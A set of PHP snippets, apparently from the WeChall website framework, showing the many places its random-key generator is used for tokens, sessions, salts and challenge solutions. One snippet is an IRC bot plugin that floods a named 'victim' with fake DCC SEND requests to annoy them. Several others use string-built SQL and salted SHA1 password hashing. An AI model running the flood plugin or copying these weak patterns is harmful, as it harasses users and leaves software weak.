public function onAddSite() { $form = $this->getForm(); if (false !== ($error = $form->validate($this->module))) { return $error . $this->templateSiteAdd(); } $site = new WC_Site(array('site_status' => 'wanted', 'site_name' => $form->getVar('site_name'), 'site_classname' => $form->getVar('site_classname'), 'site_country' => 0, 'site_language' => 0, 'site_joindate' => GWF_Time::getDate(GWF_Date::LEN_SECOND), 'site_launchdate' => '', 'site_authkey' => GWF_Random::randomKey(32), 'site_xauthkey' => GWF_Random::randomKey(32), 'site_irc' => '', 'site_url' => '', 'site_url_mail' => '', 'site_url_score' => '', 'site_url_profile' => '', 'site_score' => 0, 'site_basescore' => 0, 'site_avg' => 0, 'site_vote_dif' => 0, 'site_vote_fun' => 0, 'site_challcount' => 0, 'site_usercount' => 0, 'site_visit_in' => 0, 'site_visit_out' => 0, 'site_options' => 0, 'site_boardid' => 0, 'site_threadid' => 0, 'site_tags' => '')); if (false === $site->insert()) { return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__)); } Module_WeChall::includeVotes(); if (false === $site->onCreateVotes()) { return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__)); } Module_WeChall::includeForums(); if (false === $site->onCreateBoard()) { return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__)); } if (false === $site->onCreateThread($this->module)) { return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__)); } require_once GWF_CORE_PATH . 'module/WeChall/WC_SiteDescr.php'; if (false === WC_SiteDescr::insertDescr($site->getID(), 1, 'Please edit me :)')) { return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__)); } return $this->module->message('msg_site_added'); }
private static function generateToken() { do { $token = GWF_Random::randomKey(self::TOKEN_LEN); } while (false !== self::getByToken($token)); return $token; }
private static function randomWarToken() { $back = ''; for ($i = 0; $i < 6; $i++) { $back .= '-' . GWF_Random::randomKey(5, '0123456789ABCDEF'); } return substr($back, 1); }
public static function generateToken() { $token = GWF_Random::randomKey(self::TOKEN_LENGTH); $ua = new self(false); if (false !== $ua->selectFirst('1', sprintf('token=\'%s\'', $ua->escape($token)))) { return self::generateToken(); } return $token; }
/** * @param $userid int * @param $type string * @param $data string * @return string new token */ public static function createToken($userid, $type, $data = false) { $token = GWF_Random::randomKey(self::TOKEN_LENGTH); $gdodata = array('userid' => $userid, 'type' => $type, 'token' => $token, 'timestamp' => time()); if (is_string($data)) { $gdodata['data'] = $data; } $ac = new self($gdodata); return false === $ac->replace() ? false : $token; }
private function onCrossRegister($username) { $options = 0; $password = GWF_Random::randomKey(); $user = new GWF_User(array('user_id' => 0, 'user_options' => $options, 'user_name' => $username, 'user_password' => GWF_Password::hashPasswordS($password), 'user_regdate' => GWF_Time::getDate(GWF_Date::LEN_SECOND), 'user_regip' => GWF_IP6::getIP(GWF_IP_EXACT), 'user_email' => '', 'user_gender' => 'no_gender', 'user_lastlogin' => time(), 'user_lastactivity' => time(), 'user_birthdate' => '00000000', 'user_avatar_v' => 0, 'user_countryid' => 0, 'user_langid' => 1, 'user_langid2' => 0, 'user_level' => 0, 'user_title' => '', 'user_settings' => '', 'user_data' => '', 'user_credits' => '0.00')); if (false === $user->insert()) { return false; } return true; }
function crypto_dig1_map(array &$map, $c) { while (true) { $m = GWF_Random::randomKey(2, 'abcdefghijklmnopqrstuvwxyz'); if (!in_array($m, $map)) { $map[$c] = $m; break; } } return $map; }
function prog2NextQuestion(WC_Challenge $chall) { if (false === ($user = GWF_Session::getUser())) { die($chall->lang('err_login')); } $solution = GWF_Random::randomKey(rand(9, 12)); GWF_Session::set('prog2_solution', $solution); GWF_Session::set('prog2_timeout', microtime(true)); // GWF_Session::commit(); die($solution); }
/** * Generate a new token in session. * Returns tokenid. the session is an array of tokenid => userdata * @param $userdata * @return string */ public static function generateToken($userdata) { // if (self::DEBUG) // { // return "disabled"; // } if (!GWF_Session::exists(self::TOKEN_NAME)) { GWF_Session::set(self::TOKEN_NAME, array()); } $a =& GWF_Session::get(self::TOKEN_NAME); $token = GWF_Random::randomKey(self::TOKEN_ENTROPY); $a[$token] = array(time(), $userdata); self::cleanupOldTokens(); return $token; }
function crackcha_next(WC_Challenge $chall) { if (crackcha_round_over()) { header('Content-Type: text/plain'); if (false === crackcha_insert_high($chall)) { echo GWF_HTML::lang('ERR_DATABASE', array(__FILE__, __LINE__)); return; } else { echo $chall->lang('msg_insert_high') . PHP_EOL; echo crackcha_reset($chall); return; } } require_once GWF_CORE_PATH . 'inc/3p/Class_Captcha.php'; $chars = GWF_Random::randomKey(5, GWF_Random::ALPHAUP); crackcha_increase_count(); GWF_Session::set('WCC_CRACKCHA_CHARS', $chars); $aFonts = array(GWF_PATH . 'extra/font/teen.ttf'); $rgbcolor = GWF_CAPTCHA_COLOR_BG; $oVisualCaptcha = new PhpCaptcha($aFonts, 210, 42, $rgbcolor); $oVisualCaptcha->Create('', $chars); }
function Upgrade_WeChall_1_01(Module_WeChall $module) { var_dump('TRIGGERED Upgrade_WeChall_1_01 (chall_token)'); $db = gdo_db(); $challs = GWF_TABLE_PREFIX . 'wc_chall'; $query = "ALTER TABLE {$challs} ADD COLUMN chall_token CHAR(8) CHARACTER SET ascii COLLATE ascii_bin NOT NULL DEFAULT ''"; if (false === $db->queryWrite($query)) { return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__)); } $query = "SELECT chall_id FROM {$challs}"; if (false === ($result = $db->queryRead($query))) { return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__)); } while (false !== ($row = $db->fetchRow($result))) { $id = $row[0]; $token = GWF_Random::randomKey(8); if (false === $db->queryWrite("UPDATE {$challs} SET chall_token='{$token}' WHERE chall_id={$id}")) { return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__)); } } $db->free($result); return ''; }
require_once "challenge/html_head.php"; //html_head("Install Addslashes"); if (!GWF_User::isAdminS()) { echo GWF_HTML::err('ERR_NO_PERMISSION'); return; } // $title = GWF_PAGE_TITLE; $solution = $solution; $score = 4; $url = "challenge/training/php/experience/index.php"; $creators = "Gizmore"; $tags = 'MySQL,PHP,Exploit'; WC_Challenge::installChallenge(GWF_PAGE_TITLE, $solution, $score, $url, $creators, $tags); if (!($db = gdo_db_instance(EXP_DB_HOST, EXP_DB_USER, EXP_DB_PASS, EXP_DB_NAME))) { die(GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__))); } $db->truncateTable('items'); $db->truncateTable('flags'); foreach ($data as $title) { $title = $db->escape($title); $db->queryWrite("INSERT INTO items VALUES(0, '{$title}', NOW())"); } $challenges = GDO::table('WC_Challenge')->selectObjects('*'); foreach ($challenges as $challenge) { $challenge instanceof WC_Challenge; $random_solution = GWF_Random::randomKey(32); $db->queryWrite("INSERT INTO flags VALUES({$challenge->getID()}, '{$random_solution}')"); } $challenge = WC_Challenge::getByTitle(GWF_PAGE_TITLE, false); $db->queryWrite("REPLACE INTO flags VALUES({$challenge->getID()}, '{$solution}')"); require_once "challenge/html_foot.php";
/** * Generate a download token. * @return string */ public static function generateToken() { return GWF_Random::randomKey(self::TOKEN_LENGTH, GWF_Random::ALPHANUMUPLOW); }
/** * Strong Hashing function. using unique salt, dynamic salt and a rather strong algorithm. * @param $string * @return string salted SHA1 hash */ public static function hashPasswordS($password) { $salt = GWF_Random::randomKey(self::SALTLEN); // Generate random salt. return self::hashSHA1(self::SECRET_SALT . $password . $salt . self::SECRET_SALT) . $salt; }
private static function genSolution() { $solution = GWF_Random::randomKey(32, GWF_Random::ALPHANUMUPLOW); GWF_Session::set('LIV_SMI_SOL', $solution); return $solution; }
/** * Reset counter and password. * @return true|false */ function blightReset($consec = true) { if ($consec) { # Reset consecutive success counter. blightFailed(); } # Take a timestamp. GWF_Session::set('BLIGHT3_TIME_START', time()); # Generate a new hash. $db = blightDB(); $sessid = GWF_Session::getSessSID(); $hash = GWF_Random::randomKey(32, 'ABCDEF0123456789'); $query = "REPLACE INTO blight VALUES({$sessid}, '{$hash}', 0)"; return $db->queryWrite($query); }
/** * Reset counter and password. * @return true|false */ function blightReset() { $db = blightDB(); $sessid = GWF_Session::getSession()->getID(); $hash = GWF_Random::randomKey(32, 'ABCDEF0123456789'); $query = "REPLACE INTO blight VALUES({$sessid}, '{$hash}', 0)"; return $db->queryWrite($query); }
/** * Copy .example files and replace Variables * Example files have to be in GWF_CORE_PATH/inc/install/data * @param string $file the filename without extension * @param string $path the destination path * @param string $ext file extension (e.g. .php) */ public static function CopyExampleFile($file, $path, $ext = '.php', &$output) { $copied = $path . $file . $ext; if (false === Common::isFile($copied)) { if (false === GWF_File::isWriteable($copied)) { $output .= GWF_InstallWizard::wizard_error('err_copy', array($copied)); return false; } # Load skeleton. $example = GWF_CORE_PATH . 'inc/install/data/' . $file . '.example' . $ext; if (false === ($content = file_get_contents($example))) { $output .= GWF_HTML::err('ERR_FILE_NOT_FOUND', array($example)); return false; } # Replacements $replace = array('%%GWFPATH%%' => GWF_DETECT_PATH, '%%DB%%' => escapeshellarg(GWF_DB_DATABASE), '%%USER%%' => escapeshellarg(GWF_DB_USER), '%%PASS%%' => escapeshellarg(GWF_DB_PASSWORD), '%%SALT%%' => escapeshellarg(GWF_Random::randomKey(16))); $content = str_replace(array_keys($replace), array_values($replace), $content); # Write custom file. if (false === file_put_contents($copied, $content)) { $output .= GWF_HTML::err('ERR_WRITE_FILE', array($copied)); return false; } if (false === chmod($copied, GWF_CHMOD)) { $output .= GWF_InstallWizard::wizard_error('err_copy', array($example)); return false; } $output .= GWF_InstallWizard::wizard_message('msg_copy', array($copied)); } else { $output .= GWF_InstallWizard::wizard_message('msg_copy_untouched', array($copied)); } return true; }
/** * Config Vars are an array of array($type, $section, $varname, $varvalue, $comment). Types are: 'int10', 'int8', 'text', 'bool', 'script'. * @return array of array($type, $section, $varname, $varvalue, $comment) */ private static function getDefaults(GWF_LangTrans $lang) { if (PHP_SAPI === 'cli') { $domain = 'localhost'; $self = '/'; } else { $domain = $_SERVER['HTTP_HOST']; $self = substr($_SERVER['REQUEST_URI'], 0, strrpos($_SERVER['REQUEST_URI'], '/install/') + 1); } $path = GWF_PATH; $temp = array(array('text', 'Main', 'GWF_DOMAIN', $domain, 'Example: \'www.foobar.com\'.'), array('text', 'Main', 'GWF_SITENAME', 'Gizmore Website Framework', 'Your Site`s name. htmlspecialchars() it yourself.'), array('text', 'Main', 'GWF_WEB_ROOT_NO_LANG', $self, 'Add trailing and leading slash. Example: \'/\' or \'/mywebdir/\'.'), array('text', 'Main', 'GWF_DEFAULT_DOCTYPE', 'html5', 'Set the default html-doctype for gwf. Modules can change it.'), array('int10', 'Main', 'GWF_LOG_BITS', 0xfff, 'bitmask for logging: NONE = 0; GWF_WARNING = 0x01; GWF_MESSAGE = 0x02; GWF_ERROR = 0x04; GWF_CRITICAL = 0x08; PHP_ERROR = 0x10; DB_ERROR = 0x20; SMARTY = 0x40; HTTP_ERROR = 0x80; HTTP_GET = 0x100; HTTP_POST = 0x200; IP = 0x400;'), array('text', '3rd Party', 'GWF_SMARTY_PATH', GWF_SMARTY_PATH, 'Path to Smarty.class.php. Smarty replaced the GWF template engine and has to be available.'), array('text', '3rd Party', 'GWF_JPGRAPH_PATH', '/opt/php/jphraph/jpgraph.php', 'Path to jpgraph.php. JPGraph is a library to draw graphs with php. It is available under the GPL.'), array('text', '3rd Party', 'GWF_GESHI_PATH', '/opt/php/geshi/geshi.php', 'Path to geshi.php. GeSHi is a GPL licensed Syntax highlighter.'), array('text', 'Smarty', 'GWF_SMARTY_DIRS', $path . 'extra/temp/smarty/', 'Path to smarty directories for cache, config and compiling. With trailing slash.'), array('bool', 'Smarty', 'GWF_ERRORS_TO_SMARTY', true, 'Errors and Messsages are added to a smarty templatevar. If not set it is added before Pagecontent.'), array('text', 'Defaults', 'GWF_DEFAULT_LANG', 'en', 'Fallback language. Should be \'en\'.'), array('text', 'Defaults', 'GWF_DEFAULT_MODULE', 'GWF', '1st visit module. Example: \'MyModule\'.'), array('text', 'Defaults', 'GWF_DEFAULT_METHOD', 'About', '1st visit method. Example: \'Home\'.'), array('text', 'Defaults', 'GWF_DEFAULT_DESIGN', 'default', 'Default design. Example: \'default\'.'), array('text', 'Defaults', 'GWF_ICON_SET', 'default', 'Default Icon-Set. Example: \'default\'.'), array('text', 'Defaults', 'GWF_DOWN_REASON', 'Converting the database atm. should be back within 45 minutes.', 'The Message if maintainance-mode is enabled.'), array('text', 'Language', 'GWF_LANG_ADMIN', 'en', 'Admins language. Should be \'en\'.'), array('text', 'Language', 'GWF_SUPPORTED_LANGS', 'en;de;fr;it;pl;hu;es;bs;et;fi;ur;tr;sq;nl;ru;cs;sr;lv', 'Separate 2 char ISO codes by semicolon. Currently (partially) Supported: en;de;fr;it;pl;hu;es;bs;et;fi;ur;tr;sq;nl;ru;cs;sr'), array('int10', 'Various', 'GWF_ONLINE_TIMEOUT', 60, 'A request will mark you online for N seconds.'), array('int10', 'Various', 'GWF_CRONJOB_BY_WEB', 0, 'Chance in permille to trigger cronjob by www clients (0-1000)'), array('bool', 'Various', 'GWF_USER_STACKTRACE', true, 'Show stacktrace to the user on error? Example: true.'), array('text', 'Database', 'GWF_SECRET_SALT', GWF_Random::randomKey(16, GWF_Random::ALPHANUMUPLOW), 'May not be changed after install!'), array('int8', 'Database', 'GWF_CHMOD', 0700, 'CHMOD mask for file creation. 0700 for mpm-itk env. 0777 in worst case.'), array('text', 'Database', 'GWF_DB_HOST', 'localhost', 'Database host. Usually localhost.'), array('text', 'Database', 'GWF_DB_USER', '', 'Database username. Example: \'some_sql_username\'.'), array('text', 'Database', 'GWF_DB_PASSWORD', '', 'Database password.'), array('text', 'Database', 'GWF_DB_DATABASE', '', 'Database db-name.'), array('text', 'Database', 'GWF_DB_TYPE', 'mysql', 'Database type. Currently only \'mysql\' is supported.'), array('text', 'Database', 'GWF_DB_ENGINE', 'myIsam', 'Default database table type. Either \'innoDB\' or \'myIsam\'.'), array('text', 'Database', 'GWF_TABLE_PREFIX', 'gwf_', 'Database table prefix. Example: \'gwf3_\'.'), array('text', 'Session', 'GWF_SESS_NAME', 'GWF', 'Cookie Prefix. Example: \'GWF\'.'), array('int10', 'Session', 'GWF_SESS_LIFETIME', 60 * 240, 'Session lifetime in seconds.'), array('int10', 'Session', 'GWF_SESS_PER_USER', '1', 'Number of allowed simultanous sessions per user. Example: 1'), array('text', 'IP', 'GWF_IP_QUICK', 'hash_32_1', 'Hashed IP Duplicates. See core/inc/util/GWF_IP6.php'), array('text', 'IP', 'GWF_IP_EXACT', 'bin_32_128', 'Complete IP storage. See core/inc/util/GWF_IP6.php'), array('int10', 'EMail', 'GWF_DEBUG_EMAIL', 15, 'Send Mail on errors? 0=NONE, 1=DB ERRORS, 2=PHP_ERRORS, 4=404, 8=403, 16=MailToScreen)'), array('text', 'EMail', 'GWF_BOT_EMAIL', 'robot@' . $domain, 'Robot sender email. Example: robot@www.site.com.'), array('text', 'EMail', 'GWF_ADMIN_EMAIL', isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : 'admin@' . $domain, 'Hardcoded admin mail. Example: admin@www.site.com.'), array('text', 'EMail', 'GWF_SUPPORT_EMAIL', 'support@' . $domain, 'Support email. Example: support@www.site.com.'), array('text', 'EMail', 'GWF_STAFF_EMAILS', '', 'CC staff emails seperated by comma. Example: \'staff@foo.bar,staff2@blub.org\'.')); $back = array(); foreach ($temp as $t) { $back[$t[self::VARNAME]] = $t; } return $back; }
private static function createSession($create_etag = false) { $sessid = GWF_Random::randomKey(self::SESS_ENTROPY); $session = new self(array('sess_id' => 0, 'sess_sid' => $sessid, 'sess_user' => NULL, 'sess_data' => NULL, 'sess_time' => time(), 'sess_ip' => NULL, 'sess_lasturl' => NULL)); if (false === $session->insert()) { return false; } self::$SESSION = $session; // if ($create_etag) // { // self::setETag($session->getVar('sess_id'), 0, $sessid); // } self::setCookies($session->getVar('sess_id'), 0, $sessid); return true; }
private function garbage($real_token = '???', $real_mc = '???', $ext_msg = 'somethings wrong') { $msg = sprintf('InvalidMC: uid=%d, token=%s(%s), mc=%s(%s): %s.', Common::getGet('id') - 1000, Common::getGet('token'), $real_token, Common::getGet('mc'), $real_mc, $ext_msg); GWF_Log::log('baim_log.txt', $msg); return GWF_Random::randomKey(self::SHA512_LEN, GWF_Random::HEXLOWER); }
private static function createMCRow($userid, $demo) { $options = 0; $options |= $demo === true ? self::DEMO : 0; $row = new self(array('bmc_uid' => $userid, 'bmc_date' => NULL, 'bmc_token' => GWF_Random::randomKey(self::TOKEN_LEN, GWF_Random::ALPHANUMUPLOW), 'bmc_mc' => NULL, 'bmc_expires' => NULL, 'bmc_options' => $options)); if (false === $row->insert()) { return false; } return $row; }
<?php $lang = array('en' => array('help' => 'Usage: %CMD% <victim> [<amt=10>]. Try to send masses of DCC SEND file requests to annoy a particular user.', 'good' => 'Protected Clients: nettalk', 'bad' => 'Flawed Clients: kvirc')); $plugin = Dog::getPlugin(); $argv = $plugin->argv(); $argc = count($argv); if ($argc === 1) { $amt = 10; } elseif ($argc === 2) { if (0 >= ($amt = (int) $argv[1])) { return $plugin->showHelp(); } } else { return $plugin->showHelp(); } $user = Dog::getUserByArg($argv[0]); $server = Dog::getServer(); $one = chr(1); $ip = ip2long('92.77.135.158'); for ($i = 0; $i < $amt; $i++) { $filename = GWF_Random::randomKey(16) . '.txt'; $port = rand(10000, 50000); $filesize = rand(20000, 80000); $payload = "PRIVMSG {$user->getName()} :{$one}DCC SEND {$filename} {$ip} {$port} {$filesize}{$one}"; // $payload = "PRIVMSG {$user->getName()} :{$one}DCC CHAT $ip $port{$one}"; $server->sendRAW($payload); }
/** * Create a new options row. * @param unknown_type $userid * @return GWF_ForumOptions */ private static function createOptions($userid) { $row = new self(array('fopt_uid' => $userid, 'fopt_token' => GWF_Random::randomKey(GWF_Random::TOKEN_LEN), 'fopt_subscr' => self::SUBSCRIBE_NONE, 'fopt_signature' => '', 'fopt_options' => 0, 'fopt_thanks' => 0, 'fopt_upvotes' => 0, 'fopt_downvotes' => 0, 'fopt_posts' => 0)); if (false === $row->replace()) { return false; } return $row; }
private static function getMibbitNickname() { if (false !== ($user = GWF_Session::getUser())) { return $user->getVar('user_name'); } return GWF_SITENAME . '_' . GWF_Random::randomKey(8, '0123456789'); }
private function onNewSign($email, $type, $langid) { $subscribe = new GWF_Newsletter(array('nl_email' => $email, 'nl_userid' => GWF_Session::getUserID(), 'nl_options' => $type, 'nl_unsign' => GWF_Random::randomKey(16), 'nl_langid' => $langid, 'nl_mailed_ids' => ':')); if (false === $subscribe->replace()) { return GWF_HTML::err('ERR_DATABASE', array(__FILE__, __LINE__)); } return $this->module->message('msg_signed'); }
$prot = $server->isSSL() ? 'ircs' : 'irc'; $port = $server->getPort(); } else { $url = parse_url($argv[0]); if (!isset($url['host'])) { return $plugin->rply('err_url'); } $host = $url['host']; $prot = isset($url['scheme']) ? strtolower($url['scheme']) : 'irc'; if ($prot !== 'irc' && $prot !== 'ircs') { return $plugin->rply('err_url'); } $default_port = $prot === 'ircs' ? 6697 : 6667; $port = isset($url['port']) ? intval($url['port']) : $default_port; $options = Dog_Server::DEFAULT_OPTIONS; $options |= $prot === 'ircs' ? Dog_Server::SSL : 0; } if (false !== ($server = Dog::getServerByArg($argv[0])) || false !== ($server = Dog::getServerByArg($host))) { $plugin->reply('reconnecting'); $server->saveOption(Dog_Server::ACTIVE, true); $server->saveOption(Dog_Server::SSL, $prot === 'ircs'); $server->saveVar('serv_port', $port); } else { $plugin->reply('adding_server'); $server = Dog_Server::getOrCreate($host, $port, $options); $server->setVar('dog_connector', Dog::getUser()); $server->setConf('ircoppass', GWF_Random::randomKey(8)); Dog::addServer($server); } $server->setConnectIn(0.5); $plugin->rply('connect');
public static function generateToken() { return GWF_Random::randomKey(self::TOKEN_LEN); }